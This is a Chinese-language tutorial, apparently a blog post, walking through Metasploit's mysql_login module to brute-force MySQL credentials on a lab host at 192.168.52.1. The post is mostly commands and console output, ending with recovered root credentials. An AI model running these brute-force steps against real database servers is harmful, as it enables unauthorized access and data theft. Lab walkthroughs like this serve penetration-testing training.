社区微信群开通啦,扫一扫抢先加入社区官方微信群
社区微信群
Mysql是个关系型数据库管理系统,由瑞典Mysql AB开发,目前属于Oracle公司,在Metasploitable系统中,Mysql的身份认证存在漏洞,这个漏洞可以让攻击者不必提供正确的身份证书便可访问Mysql数据库。本教程将介绍使用Metasploit的Mysql扫描模块渗透攻击Mysql数据库服务。
(1)启动MSFCONSOLE。
root@kali:~#msfconsole(2)扫描所有有效的Mysql模块。
msf > search mysql
[!] Module database cache not built yet, using slow search
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/admin/http/manageengine_pmp_privesc 2014-11-08 normal ManageEngine Password Manager SQLAdvancedALSearchResult.cc Pro SQL Injection
auxiliary/admin/http/rails_devise_pass_reset 2013-01-28 normal Ruby on Rails Devise Authentication Password Reset
auxiliary/admin/mysql/mysql_enum normal MySQL Enumeration Module
auxiliary/admin/mysql/mysql_sql normal MySQL SQL Generic Query
auxiliary/admin/tikiwiki/tikidblib 2006-11-01 normal TikiWiki Information Disclosure
auxiliary/analyze/jtr_mysql_fast normal John the Ripper MySQL Password Cracker (Fast Mode)
auxiliary/gather/joomla_weblinks_sqli 2014-03-02 normal Joomla weblinks-categories Unauthenticated SQL Injection Arbitrary File Read
auxiliary/scanner/mysql/mysql_authbypass_hashdump 2012-06-09 normal MySQL Authentication Bypass Password Dump
auxiliary/scanner/mysql/mysql_file_enum normal MYSQL File/Directory Enumerator
auxiliary/scanner/mysql/mysql_hashdump normal MYSQL Password Hashdump
auxiliary/scanner/mysql/mysql_login normal MySQL Login Utility
auxiliary/scanner/mysql/mysql_schemadump normal MYSQL Schema Dump
auxiliary/scanner/mysql/mysql_version normal MySQL Server Version Enumeration
auxiliary/scanner/mysql/mysql_writable_dirs normal MYSQL Directory Write Test
auxiliary/server/capture/mysql normal Authentication Capture: MySQL
exploit/linux/mysql/mysql_yassl_getname 2010-01-25 good MySQL yaSSL CertDecoder::GetName Buffer Overflow
exploit/linux/mysql/mysql_yassl_hello 2008-01-04 good MySQL yaSSL SSL Hello Message Buffer Overflow
exploit/multi/http/manage_engine_dc_pmp_sqli 2014-06-08 excellent ManageEngine Desktop Central / Password Manager LinkViewFetchServlet.dat SQL Injection
exploit/multi/http/zpanel_information_disclosure_rce 2014-01-30 excellent Zpanel Remote Unauthenticated RCE
exploit/multi/mysql/mysql_udf_payload 2009-01-16 excellent Oracle MySQL UDF Payload Execution
exploit/unix/webapp/kimai_sqli 2013-05-21 average Kimai v0.9.2 'db_restore.php' SQL Injection
exploit/unix/webapp/wp_google_document_embedder_exec 2013-01-03 normal WordPress Plugin Google Document Embedder Arbitrary File Disclosure
exploit/windows/mysql/mysql_mof 2012-12-01 excellent Oracle MySQL for Microsoft Windows MOF Execution
exploit/windows/mysql/mysql_start_up 2012-12-01 excellent Oracle MySQL for Microsoft Windows FILE Privilege Abuse
exploit/windows/mysql/mysql_yassl_hello 2008-01-04 average MySQL yaSSL SSL Hello Message Buffer Overflow
exploit/windows/mysql/scrutinizer_upload_exec 2012-07-27 excellent Plixer Scrutinizer NetFlow and sFlow Analyzer 9 Default MySQL Credential
post/linux/gather/enum_configs normal Linux Gather Configurations
post/linux/gather/enum_users_history normal Linux Gather User History
post/multi/manage/dbvis_add_db_admin normal Multi Manage DbVisualizer Add Db Admin输出信息显示Mysql可用模块,在模块中,选择渗透工具模块进行攻击
(3)这里使用Mysql扫描模块
msf > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(scanner/mysql/mysql_login) > (4)显示模块的有效选项
msf auxiliary(scanner/mysql/mysql_login) > show options
Module options (auxiliary/scanner/mysql/mysql_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target address range or CIDR identifier
RPORT 3306 yes The target port (TCP)
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
(5)为攻击目标指定目标系统IP,用户文件,密码文件
msf auxiliary(scanner/mysql/mysql_login) > set RHOSTS 192.168.52.1
RHOSTS => 192.168.52.1
msf auxiliary(scanner/mysql/mysql_login) > set user_file /root/username.txt
user_file => /root/username.txt
msf auxiliary(scanner/mysql/mysql_login) > set pass_file /root/password.txt
pass_file => /root/password.txt
msf auxiliary(scanner/mysql/mysql_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
(6)启用渗透攻击
[+] 192.168.52.1:3306 - 192.168.52.1:3306 - Found remote MySQL version 5.5.53
[!] 192.168.52.1:3306 - No active DB -- Credential data will not be saved!
[-] 192.168.52.1:3306 - 192.168.52.1:3306 - LOGIN FAILED: root:%null% (Incorrect: Access denied for user 'root'@'192.168.52.128' (using password: YES))
[-] 192.168.52.1:3306 - 192.168.52.1:3306 - LOGIN FAILED: root:%username% (Incorrect: Access denied for user 'root'@'192.168.52.128' (using password: YES))
[-] 192.168.52.1:3306 - 192.168.52.1:3306 - LOGIN FAILED: root:!@#$ (Incorrect: Access denied for user 'root'@'192.168.52.128' (using password: YES))
[-] 192.168.52.1:3306 - 192.168.52.1:3306 - LOGIN FAILED: root:!@#$% (Incorrect: Access denied for user 'root'@'192.168.52.128' (using password: YES))
[+] 192.168.52.1:3306 - 192.168.52.1:3306 - Success: 'root:123456'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed输出信息是渗透攻击的一个过程,尝试使用指定的用户名和密码文件中的用户名和密码连接mysql服务器,从输出信息中可以看出,已经测试出Mysql数据库服务器的用户名和密码为root和123456
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!
